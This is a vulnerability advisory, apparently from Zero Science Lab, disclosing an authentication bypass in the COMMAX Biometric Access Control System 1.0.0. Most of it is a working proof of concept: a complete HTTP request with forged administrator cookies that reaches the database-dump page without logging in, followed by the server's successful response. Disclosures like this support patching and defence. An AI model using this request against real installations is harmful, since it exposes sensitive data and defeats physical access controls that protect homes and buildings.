COMMAX Biometric Access Control System 1.0.0 Authentication Bypass

`  
COMMAX Biometric Access Control System 1.0.0 Authentication Bypass  
  
  
Vendor: COMMAX Co., Ltd.  
Prodcut web page: https://www.commax.com  
Affected version: 1.0.0  
  
Summary: Biometric access control system.  
  
Desc: The application suffers from an authentication bypass vulnerability.  
An unauthenticated attacker through cookie poisoning can bypass authentication  
and disclose sensitive information and circumvent physical controls in smart  
homes and buildings.  
  
Tested on: nginx/1.14.0 (Ubuntu)  
MariaDB/10.3.15  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5661  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php  
  
  
02.08.2021  
  
--  
  
  
The following request with Cookie forging bypasses authentication and lists available SQL backups.  
  
GET /db_dump.php HTTP/1.1  
Host: 192.168.1.1  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.1.1/user_add.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0  
Connection: close  
  
  
HTTP/1.1 200 OK  
Server: nginx/1.14.0 (Ubuntu)  
Date: Tue, 03 Aug 1984 14:07:39 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
Content-Length: 10316  
  
  
<!DOCTYPE html>  
<html class="no-js" lang="ko">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<meta http-equiv="X-UA-Compatible" content="IE=edge">  
<title>::: COMMAX :::</title>  
...  
...  
`